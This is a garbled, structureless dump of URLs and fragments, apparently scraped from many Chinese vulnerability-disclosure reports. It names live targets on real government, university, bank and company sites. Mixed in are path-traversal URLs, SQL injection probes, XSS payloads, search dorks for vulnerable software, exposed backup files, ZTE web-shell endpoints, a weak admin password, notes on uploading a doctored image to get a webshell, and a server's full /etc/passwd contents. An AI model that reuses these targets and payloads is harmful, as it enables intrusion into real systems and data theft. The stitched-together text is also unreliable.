http://tieba.baidu.com/p/2922920532?qq-pf-to=pcqq.group www.erya100.com http://wap.17k.com/user/regist.aspx http://wap.17k.com/wread/default.aspx inurl:ProductListCategory.aspx http://www.nongyou.com.cn/ http://61.133.119.187:8091//Default.aspx http://222.135.76.147:8200//Default.aspx http://222.135.127.190:7200//Default.aspx http://221.2.149.47:8200/Default.aspx http://218.59.205.41:8053/Default.aspx http://jwh.tanljgzx.gov.cn/Default.aspx http://60.217.72.17:7048/Default.aspx http://211.68.208.72/gmis_tjwgy/Byyxwgl/dbwyhlist.aspx 
http://gs.njfu.edu.cn/Gmis/Byyxwgl/dbwyhlist.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/dbwyhlist.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://218.75.27.177/Gmis/Byyxwgl/dbwyhlist.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://101.76.99.20/Gmis/Byyxwgl/dbwyhlist.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/dbwyhlist.aspx http://211.64.205.214/Gmis/Byyxwgl/dbwyhlist.aspx http://t.admin.ccb.dingzhiweixin.com/main/ http://210.41.225.91:96/login.aspx http://www.xm120.net/120news/ http://www.xmcdc.com.cn/cdcnews/ http://www.smwsjd.com/smwsjd/ http://www.hlwsjd.com/hlnews/ http://www.xmwsjd.com/wsjd/ http://www.xm120.net/120news//FCKeditor/_samples/default.html http://www.xm120.net//120news/UserFiles/Image/1.jsp http://www.xm120.net/120news/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.xm120.net/120news/admin/user_add.jsp http://www.xm120.net/120news/admin/login.jsp http://*/*/cd/right_right.jsp中给刚才新增的帐号赋权限,其实我们利用的就是一个登录的session, http://*/*/cd/file_list.jsp http://*/*/news/news_list.jsp http://*/*/cd/right_right.jsp http://www.hlwsjd.com/hlnews//FCKeditor/_samples/default.html http://www.hlwsjd.com/hlnews/admin/user_add.jsp http://www.hlwsjd.com/hlnews/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.hlwsjd.com/hlnews/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.xmcdc.com.cn/cdcnews/FCKeditor/_samples/default.html 
http://www.xmcdc.com.cn/cdcnews//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.csqiandu.com/ http://e.fangdd.com/ http://china35.com/ http://superman.tgbus.com/login.shtml http://www.ffan.com www.ffan.com http://zjy.gdcost.com/ http://zjy.gdcost.com/uploadImg_slt/2015-03/bbed6195-ad6f-4b21-b406-3145a6f1c5a2.jpg。然后把图片下载下来,用老外的jpgshell进行处理。然后再burp改包上传即可getshell http://zjy.gdcost.com/uploadImg_slt/2015-03/037fdb58-0af8-4cb9-8479-d0499c80a687.asp http://cmis.pkuschool.edu.cn/qasss/login.jsp http://cmis.rdfz.cn/qasss/login.jsp http://117.117.98.2/qasss/login.jsp http://cmis.cnuschool.org.cn http://58.129.16.19/qasss/login.jsp http://58.133.218.8/qasss/login.jsp http://58.133.169.200/qasss/login.jsp http://58.133.216.10/qasss/login.jsp http://58.129.42.1/qasss/login.jsp http://61.50.229.140/qasss/login.jsp http://58.119.188.22/qasss/DownloadAttachAction.a?attachid=4242 http://piao.ffan.com/good_list?mechant=2072413 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsSyncGetInfos soapenv:Body soapenv:Envelope www.hzgjj.gov.cn http://180.153.28.152:8081/Portals/NoticeShowDetail.aspx?tid=35 http://gh.cmge.com/guild/desc/id/116?searchkey=1 http://sqlmap.org http://shixi.189.cn/shixibao/cp.php?ac=enterprise_job&ig http://sqlmap.org http://tclcomm.com/service/serinter.asp?type=%BD%BB%BB%BB%BB%FA http://tclcomm.com/service/sernet1.asp?id=%E7%94%98%E8%82%83 http://tclcomm.com/purchase/info.asp?typeid=5 http://tclcomm.com/product/lefttop.asp?LanmuID=137&Pid=845&TypeID=12 
http://tclcomm.com/zhaopin/zhaopin_detail.asp?zpid=152 http://tclcomm.com/news/newssearch.asp http://www.tclcomm.com/purchase/profiledown.asp?myPath=\qiyexingxiang\..\..\..\..\\WWW http://www.8telecom.cn/OA/login.php http://www.rrtxsz.com/ http://www.rrtxsz.com/admin/login.php http://www.ahty.gov.cn/xwzx-sjxw/article.jsp?articleId=32816,估计还存在其他链接 http://www.koohoo.cn/app/88720140508120908953.html www.koohoo.cn http://bbs.koohoo.cn/ http://idiantech.com/RELEASE-NOTES.txt http://kuaihuu.com/ http://www.idiantech.com/index.html http://weili68.com/ http://wifi.kuai51.com/ http://weili68.com/site/kefu.html http://www.koohoo.cn/special/49.html http://ll.kuai51.com/ http://bbs.koohoo.cn/thread-258-1-1.html http://m.koohoo.cn/app/35020131113213407466.html http://kuaihuu.com/file/kuaihu.apk http://www.yichemall.com/Service/index http://shop.dhs-sports.com/agentlist.asp?selectedIndex=406 http://www.wooyun.org/bugs/wooyun-2014-082496/trace/01de32cfa3cddd554ea59c4926d1e601。但是当时没有深入研究,导致WOOYUN主动忽略了该漏洞,前段时间一时无聊,又重新深入研究了一下该漏洞,发现了更多问题,认为还是比较严重的。 http://www.cqsloa.com http://www.dystats.gov.cn/view.php?id=1112 http://www.dystats.gov.cn/view.php?id=1112 http://sqlmap.org http://www.guojiayikao.com/order/deliver.php?action=edit&deliverid=15035 http://www.tchjbh.gov.cn/news_display.php?id=148 http://m.zhuna.cn/order_nologin.php?tel=用户手机号码 http://m.zhuna.cn/order_nologin.php?tel=13800138000 http://app.cqrcb.com:81/apply/SearchMerchant http://222.180.251.107:82/appForOnline/IndexAction http://hr.cqrcb.com/perinvite/IndexAction.action http://app.cqrcb.com:81/apply/ http://218.94.6.85/news/newsView.aspx?id=140 url:http://www.bbktel.com.cn/showNews.php?Class_ID=6&News_ID=17 www.ffan.com https://jf.ffan http://211.83.241.103:8080/ http://211.83.241.105:8080/ http://push.zhenai.com/web/login http://**.**.**/webeditor/admin/login.jsp_ http://cds2010.medlive.cn/login_init.do http://t.cn/***** http://202.75.221.11/zjnj2011/Application/Application/ToViewLog.aspx 
http://218.94.30.9/Application/Application/ToViewLog.aspx http://218.26.97.198/sx2014/Application/Application/ToViewLog.aspx http://59.61.92.123:12345/njbt2013/Application/Application/ToViewLog.aspx http://218.77.183.70/njbt2013/Application/Application/ToViewLog.aspx http://60.190.2.79/Njbt2013/Application/Application/ToViewLog.aspx http://220.171.42.161/xjnj2013/Application/Application/ToViewLog.aspx http://222.247.48.179:8000/Application/Application/ToViewLog.aspx http://61.138.188.217/jl2013/Application/Application/ToViewLog.aspx http://182.148.114.118/2013/Application/Application/ToViewLog.aspx http://amic.jxagri.gov.cn/nybgj2013/Application/Application/ToViewLog.aspx http://113.140.74.6/sx2012/Application/Application/ToViewLog.aspx http://218.7.20.102:9002/njbt2013/Application/Application/ToViewLog.aspx http://61.161.166.69:2013/Application/Application/ToViewLog.aspx http://njbt2012.gdnj.gov.cn/Application/Application/ToViewLog.aspx http://218.58.77.226/njgzbt2011/Application/Application/ToViewLog.aspx http://218.201.202.239:8081/gznj2013/Application/Application/ToViewLog.aspx http://116.52.13.46/test2013/Application/Application/ToViewLog.aspx http://61.178.38.194/gsnjbt2012/Application/Application/ToViewLog.aspx http://bt.ahnjh.gov.cn/2011/Application/Application/ToViewLog.aspx http://218.77.183.70/njbt2013/Application/ToViewLog.aspx为例: http://218.77.183.70/njbt2013/Application/ToViewLog.aspx http://shop.100msh.com/index/set_area?area_id=57 http://www.bjnewmen.com/admin/login.aspx http://www.infzm.com/newsmap.tar.gz http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://ditu.google.cn/maps?file=api&v=2&key=ABQIAAAAJfHBACIJtxTEFm_nOl0qnhSdfEJ9AprUyArBsRlghnRcjWrCyxQ-hpTR_AlqZYeeQF-tkzLzj7XLXg http://images.infzm.com/js/com/infzm/newsmap/assemble.js http://images.infzm.com/js/com/infzm/newsmap/page/default.js mysql:host=dbserver;dbname=infzm http://www.gla.uestc.edu.cn/chinese/picture_news.php?act=list&id=25 
http://emobile.weaver.com.cn/case.html http://oa.chinajiutai.com:89/login.do http://www.fsxtx.cn/login.do http://m.zxhsd.com/login.do http://wap.helichina.com http://m.liando.cn http://www.gpsoo.net/user/ http://www.zteup.com/pc_sellerdownload.jsp MD5:1D:81:74:40:79:58:9A:DC:3C:39:51:94:36:D4:10:E0 SHA1:F1:E8:E9:E3:F3:1C:AD:4E:3E:C5:D5:D5:1A:4D:B4:54:C5:24:31:7B http://www.hontai.com.tw/09pages/cont/NewsCenter.aspx?Uid=ABH05&Cid=A0001&Numid=346#PABH04 www.xiangshe.com http://i.byd.com.cn,需要车主输入手机号和密码(买车时在4S店设置) http://210.31.176.18/Administration/UniteStand/Default.aspx http://210.31.176.18/Administration/UniteStand/ShowNews.aspx?ID=3de417459202491d9367ceaef21be2eb https://www.cunli.cn http://ee.hnu.cn/eeold/php/news/detail.php?id=3088 http://**.**.**/login.aspx http://ftms.cigtest.com.cn/admin/ http://zone.wooyun.org/content/19414 http://www.walkingtaiwan.org/content/search/en/js/login/text/js3.asp http://slhr.ruc.edu.cn/Doctor/admin/index.asp http://comment.info.hc360.com http://comment.info.hc360.com/comment/lw/morelw.action?areacode=041&systype=0*&templateid=0&infoid=6171&type=0 http://comment.info.hc360.com/comment/login.jsp http://comment.info.hc360.com/comment/stat/mainpage.action http://xxgl.slxxw.cn/login.do http://baoxian.cntaiping.com/ http://e.fangdd.com/ http://e.fangdd.com:80/ http://cas.hdu.edu.cn/cas/pwd/ http://cas.hdu.edu.cn/cas/i/ http://cas.hdu.edu.cn/cas/j/ http://cas.hdu.edu.cn/cas/c/ http://cas.hdu.edu.cn/cas/manager/ http://www.yfjcy.gov.cn/owen/?id=1582 http://www.yfjcy.gov.cn/admin/adminlogin.asp http://gs.njfu.edu.cn/Gmis/Byyxwgl/lxgcxxlr.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://218.75.27.177/Gmis/Byyxwgl/lxgcxxlr.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://101.76.99.20/Gmis/Byyxwgl/lxgcxxlr.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/lxgcxxlr.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxgcxxlr.aspx 
http://211.64.205.214/Gmis/Byyxwgl/lxgcxxlr.aspx http://www.iepiao.com/iepiaoindex.action http://online.wl-expo.com/exhibitor/supType_hoPa.action http://mall.wl-expo.com/relaxationShop_index.action http://dns.aizhan.com/?q=220.191.211.134&page=2 http://easyscholar.ruc.edu.cn/ http://www.lnlib.com/readerbbs/sendweb/detail.asp?ibb=72756 http://video.chinaso.com/search/so?q=%22%3E%3Cimg%20src=1%20onerror=alert%281%29;%3E%3C/img%3E http://mobile.pconline.com.cn/497/4978538_7.html http://pr.956122.com/uploadPic.html http://www.m6go.com/user/doSendEmail.do http://xuanke.cufe.edu.cn http://xuanke.cufe.edu.cn/config.asp URL:https://open.boc.cn https://open.boc.cn/member/createAppUser http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://admin.tsapp.itools.hk/index.php?r=helpadmin/feedbacklist&page=5 http://sck1.yfzxmn.cn http://wooyun.org/bugs/wooyun-2015-0104732/trace/7216bb09da3045fbca81a17d7*** http://www.wooyun.org/bugs/wooyun-2010-0101073/auth/281bde8bd7dfbc0b376c524482*** site:wooyun.org inurl:trace site:wooyun.org inurl:auth http://**.**.**/Home/Login http://221.10.102.150:8086/login.asp http://110.249.218.68:8090/hbwebxf/index.jsp http://office.jsrgjy.net http://office.jsrgjy.net/config.asp http://m.yoger.com.cn/account.php?uid=480100 http://m.yoger.com.cn/myscore.php?uid=480100 http://m.yoger.com.cn/dealaddress.php?did=109943&op=del http://m.yoger.com.cn/product_list.php?search=xxxxxx http://m.yoger.com.cn/deallogin.php http://duirap76.uir.cn/view.php?id=426 http://www.szjt.gov.cn/Page/SrList.htm?t=undefined&keyword=1 http://bprz.3yoqu.com/admin/login.php http://tech.58.com/ http://61.163.107.26:8082 http://122.224.149.30:8082 http://eoffice8.weaver.cn:8028 http://219.232.254.131:8082 http://www.sywxzj.com/queryNews.do?ctid=3 http://zbb.shu.edu.cn/InformationSearchResult.aspx?Result=2015 http://zbb.shu.edu.cn/InformationSearchResult.aspx?Re 
http://nsp.lashou.com/Home/Login/index http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://wooyun.org/bugs/wooyun-2010-036412 http://www.yirendai.com/ask/questions.action http://help.tipask.com/api/php.php http://cms.956122.com/manager/login.action http://net.chinamobile.com/bbs/ http://net.chinamobile.com/bbs/data/backup~2/130726~1.sql http://ssrcc.ruc.edu.cn/pp_upfile.asp http://service.yiqifei.com/default.aspx页面的搜索框 http://sqlmap.org http://bbs.baofengcloud.com/uc_server/ http://www.sh1122.com/show_order.php?id=2 http://www.sh1122.com/show_order.php?id=7160 http://218.247.135.38/templates/index/hrlogon.jsp http://218.247.135.38/pos/posbusiness/train_get_code_tree.jsp?codesetid=1 http://218.247.135.38/pos/posbusiness/train_get_code_ http://sqlmap.org http://fjfa110.gov.cn/xiao.asp http://117.78.19.27:9888/website-rank/getVoteRecordByManuscriptId.action dir:/opt/Minge/UCMSServer/tomcat/webapps/website-rank/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin 
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash wuzhengfeng:x:501:502::/home/wuzhengfeng:/bin/bash zabbix:x:502:503::/home/zabbix:/bin/bash mysql:x:496:504::/home/mysql:/bin/bash clamav:x:495:492:Clam Checker:/var/clamav:/sbin/nologin db2inst1:x:1004:999::/home/db2inst1:/bin/bash db2fenc1:x:1003:998::/home/db2fenc1:/bin/bash dasusr1:x:1002:997::/home/dasusr1:/bin/bash http://cz.just.edu.cn/cwc/Collage_NoLink.aspx?id=0&lb=jgsz http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://114.80.159.18/ http://www.51jtx.com/toOrderDetail.htm?userInfoId=64265 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_500 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_6760 http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://szyf.chrm.gov.cn/shengji/print.aspx?ids=10,&&timeid=&&tbenddate= http://szyf.chrm.gov.cn/shengji/print.aspx?ids=257500,&&timeid=&&tbenddate= http://www.anhuids.gov.cn/articleshow.asp?classid=516 
http://www.anhuids.gov.cn/articleshow.asp?classid=516 http://www.anhuids.gov.cn/articleshow.asp?classid=516 http://www.169000.net/indexext.gl?op=2 http://www.169000.net/indexext.gl?op=1 http://www.169000.net/indexext.gl?op=9&lm=4 http://ry.ts365.org/ks/exam2/applicant/printexamid.aspx?action=new&ids=188 http://ry.ts365.org/ks/exam2/applicant/printexamid.aspx?action=new&ids=342008 http://www.indunet.net.cn/meet/ http://www.airmacau.com.tw:8082/cargo/cargo_status.asp www.airmacau.com.tw:8082 http://www.airmacau.com.tw:8082 http://www.517na.com/Default.aspx http://th.517na.com/ http://zdcg.517na.com/ http://gj.517na.com/ http://gq.517na.com/ http://user.517na.com/ http://jd.517na.com/ http://yc.517na.com/ http://wzhq.hengqin.gov.cn/scanner.php,此扫描器为弱密码admin/admin http://hr.f5.yto56.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml inurl:/Docs/Commentlist.aspx?ItemID= http://shandixb.paperopen.com//register.aspx http://ndxbskb.imu.edu.cn//register.aspx http://www.zhsyeklczz.com//register.aspx http://www.cqnuj.cn//register.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/xlslxtzdprint.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://218.75.27.177/Gmis/Byyxwgl/xlslxtzdprint.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://101.76.99.20/Gmis/Byyxwgl/xlslxtzdprint.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/xlslxtzdprint.aspx http://211.64.205.214/Gmis/Byyxwgl/xlslxtzdprint.aspx URL:HTTP://122.224.80.134 http://www.pigai.org/upload/20150331/e9d54bc8310ce1ea752f05474f747838.jpg https://61.138.128.27/ http://www.dycredit.gov.cn/admin/admin_default.php http://www.b-link.net.cn/右上角有个oa登录 http://oa.b-link.net.cn:8080/,一看,泛微! 
http://oa.b-link.net.cn:8080/log/ecology_20150306.log http://oa.b-link.net.cn:8080/tools/SWFUpload/upload.jsp height:20px;BORDER http://oa.b-link.net.cn:8080/nullwooyun.jsp,好了getwebshell不成问题了。 http://www.hrbjj.g***** http://www.aisida.cn/)开发的某套CMS程序。 inurl:cpinfo.php?id= http://www.ykchjd.com/cpinfo.php?id=1093 http://www.yingli.cc/cn/cpinfo.php?id=45 http://www.ykydqb.com/cpinfo.php?id=59 http://www.csjequipment.com/cpinfo.php?id=115 http://www.flsljx.com/cpinfo.php?id=5 http://www.ykjhzs.com/cpinfo.php?id=18 http://223.100.49.42/ http://yun.lenovo.com/join.php http://yun.lenovo.com/lxymanage/login.php,由于只是证明注入点,故没有查找数据库里账号密码。建议后台用robots.txt屏蔽。 http://xwxx.sicnu.edu.cn/mail_login.asp ip:202.115.194.37 http://fgc.sicnu.edu.cn inurl:news.php?sid= http://www.ykfwyw.gov.cn/news.php?sid=7 http://www.ykszyy.com/ek/news.php?sid=2 http://www.ykhnsh.com/news.php?sid=2 http://www.ykycdz.com/news.php?sid=1 http://www.yksllb.com/news.php?sid=1 http://www.ykeast.com/news.php?sid=2 http://www.dalmond.com.cn/news.php?sid=2 http://www.dsqzxyy.com/news.php?sid=5 http://ykchjd.com/news.php?sid=2 http://www.yksanxing.com/news.php?sid=2 http://www.ysczzx.com/news.php?sid=7 http://www.jzbyk.com/news.php?sid=4 http://www.byqzxyy.com/news.php?sid=18 http://www.yknjj.com/news.php?sid=9 http://www.ykbwg.com/news.php?sid=7 http://www.ykqby.com/news.php?sid=9 http://www.silbermannpiano.cn/news.php?sid=6 http://www.ykyyqh.com/xx/news.php?sid=8 http://www.ykwx.net/news.php?sid=9 http://www.ykswdx.net/news.php?sid=47 http://webappadmin.byd.com.cn/violation/ http://222.185.229.82/mobi/3g/login.php http://demo.173cms.com https://www.baidu.com/s?wd=%E6%82%9F%E7%A9%BACRM%20%C2%A9%20%E9%83%91%E5%B7%9E%E5%8D%A1%E5%8D%A1%E7%BD%97%E7%89%B9%E8%BD%AF%E4%BB%B6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%202013&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=1 http://wooyun.org/bugs/wooyun-2015-0105057/trace/085bbc48d3b40f0bb0d926af9021e05c 
http://webapi.byd.com.cn/router/rest http://www.bydauto.com.cn/app/package/BYDCar.apk自行测试 http://222.185.229.85/index.php https://s.bt.gg/#newwindow=1&q=site:crm.byd.com.cn http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=ea2282b12de06d2e1b7970bf2e432cd1&custId=79ab81ff34a19385ce6c0bc016f3ef6b&custCode=BYDSC072W http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=1e7e3da8e0800b69dd579854d16fb7ef&custId=3520f6e16ead95891dbc0e96fdfe7d8b&custCode=BYDGD161W http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=21d405176c760b61718223021e93248d&custId=09a51bf65c4edebb3899c6f2810740ee&custCode=BYDGZ028J http://crm.byd.com.cn/autosale/event/custEvent!custEventEdit.nc?valCode=f0d3d4837ff78741afb1a0efad381522&custId=8d55276fac3258251ba3b40481e4d980&custCode=BYDBJ046W http://ftms.cigtest.com.cn/admin/list/up_admin.php http://m.jlbank.com.cn:80/jlbankcn/data/getOutletList?param=135791&city_id=187 http://box.zhangmen.baidu.com/box-jump.html?u=javascript:alert%28document.domain%29 inurl:EduPlate\GoodoBlog\ http://yqdz.jlbank.com.cn/chk/forceQuit.do http://wooyun.org/bugs/wooyun-2015-0100501 inurl:EduPlate/HomeworkManage http://218.93.12.222:8080/ http://www.zparkhr.com.cn/data/sdcms.asp www.zparkhr.com.cn/zparkhr.com.cn.rar http://www.zparkhr.com.cn/data/xinba.asp http://xxgl.slxxw.cn/login.do http://120.31.62.218/ http://crm.netzone.com/ http://121.9.201.153/ http://221.10.14.66/zhang/ http://61.184.240.105/crm/ http://crm.ec3s.com/ http://crm.kx8.cn/ http://crm.techray.com.cn/ http://tianzhengtaisheng.3322.org/crm/ http://www.hanna.com.cn:956/ http://crm.netzone.com/VerifyUser.asp http://www.bocweb.cn/ inurl:EduPlate\GoodoBlog\ http://tools.yahui.cc http://www.bjadks.com/ http://159.226.100.90:801/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://hall.lnlib.net.cn/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://159.226.238.45/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 
http://202.117.122.49/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 http://source.mastvu.ah.cn/adksvod/ADKSAdmin/AdksAdmin/LogDetailedList.aspx?vid=123 inurl:EduPlate\PersonBlog\ http://oa.lzmc.edu.cn/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 www.oppodigital.com.hk http://www.oppodigital.com.hk www.oppodigital.com.tw http://www.oppodigital.com.tw http://www.oppodigital.com.tw/club_register.php www.oppodigital.com.tw http://www.oppodigital.com.tw http://www.oppodigital.com.hk/club_register.php www.oppodigital.com.hk http://www.oppodigital.com.hk http://202.102.101.42/ http://demo.173cms.com/注册个账号,然后随便选个东西下个订单 inurl:EduPlate/GoodoBlog http://public.wsbgt.com/Web/CatalogListPublic.aspx?tagid=18 http://www.wflib.com:8090/wsbgt/Web/CatalogListPublic.aspx?tagid=04 http://112.53.81.230:10002/gtweb/Web/CatalogListPublic.aspx?tagid=17 http://www.nxtsg.com:106/adksvod/web/CatalogListPublic.aspx?tagid=1 http://60.210.241.3:8090/wsbgt/Web/CatalogListPublic.aspx?tagid=2 http://m.aili.com/setting/feedback/ http://appserver.lenovo.com.cn http://drvdisc1.lenovo.com http://appserver.lenovo.com.cn http://drvdisc1.lenovo.com http://sc.tna.com.tw/about/media_news.aspx?type=2&year=2014 http://sc.tna.com.tw/about/media_press.aspx?type=1&year= http://sc.tna.com.tw/about/media_press_view.aspx?id=444 http://www.autono1.com/e/enews/vw.php http://www.autono1.com/s/bjxd/baoming.php http://www.autono1.com/s/bjxd/newslist.php http://www.autono1.com/e/extend/newajax.php?atype=ibrand&_=1427802175668 http://52mianliao.com http://wifi.52mianliao.com http://www.nsccjn.cn/system/common/selectDepartment.do http://www.nsccjn.cn/system/ http://www.nsccjn.cn/index/ http://www.nsccjn.cn/system/common/selectDepartment.do http://123.232.119.103:8080/ocsweb/UserLogin.aspx http://www.coolpad.com/myec/myAddress.htm# www.coolpad.com http://www.jinbei.com/search.html?keyword=a http://www.zhonghuacar.com/other/searchResult.html?keyword=a www.lqht-express.com http://oa.bontai.com/BodyFile/ 
http://www.zoomeye.org/search?q=%22Mini+web+server+1.0+ZTE%22&t=host http://222.210.178.126/web_shell_cmd.gch http://222.210.176.205/web_shell_cmd.gch http://222.208.138.195/web_shell_cmd.gch http://222.218.188.39/web_shell_cmd.gch http://222.210.181.98/web_shell_cmd.gch http://222.218.197.144/web_shell_cmd.gch http://222.210.178.90/web_shell_cmd.gch http://222.210.177.4/web_shell_cmd.gch http://map.yundasys.com:11080/action/login http://map.yundasys.com:11080/background/login.jsp http://www.dzbchina.com http://www4.sdau.edu.cn/zongwu/biaozhun/baoxiu/ http://www.csgjj.com.cn:8000/logon.do http://m.okisbank.com/#/forgetpassword http://m.okisbank.com/#/register http://www.nfgrp.cn/Index.aspx# http://goupianyi.cn/Index.aspx http://www.bjnjl.cn/Index.aspx http://mynetworkvalue.cn/Index.aspx http://www.chinafgr.com/Index.aspx http://kanqiu.hupu.com/april/news?nid=1031016 http://kanqiu.hupu.com/april/news?nid=1031016/**/and/**/1=1 http://kanqiu.hupu.com/april/news?nid=1031016/**/and/**/1=2 http://apk.hiapk.com/appinfo/com.android.suzhoumap http://www.hzrsj.gov.cn/counter/ http://www.hanwintech.com http://hq.sipedi.cn http://www.tyj.suzhou.gov.cn http://www.jdgzf.net http://rent.jdgzf.net http://58.211.42.171:9001 http://website.tyj.suzhou.gov.cn http://58.211.42.171:8099 http://www.hanwintech.com为例进行演示 http://www.hanwintech.com/upload/Picture/?dir=image http://dx.gpsllt.com/weblogin.aspx http://dx.gpsllt.com/SystemManage/Default.aspx http://www.pjqx.com/showpics.aspx?lib=11&tid=110 https://citrix.growthpoint.co.za/Citrix/XenApp/auth/login.jsp https://github.com/pyfxl/fxldoc/blob/master/IFCA/IFCA.txt)请乌云君打打星号啊! 
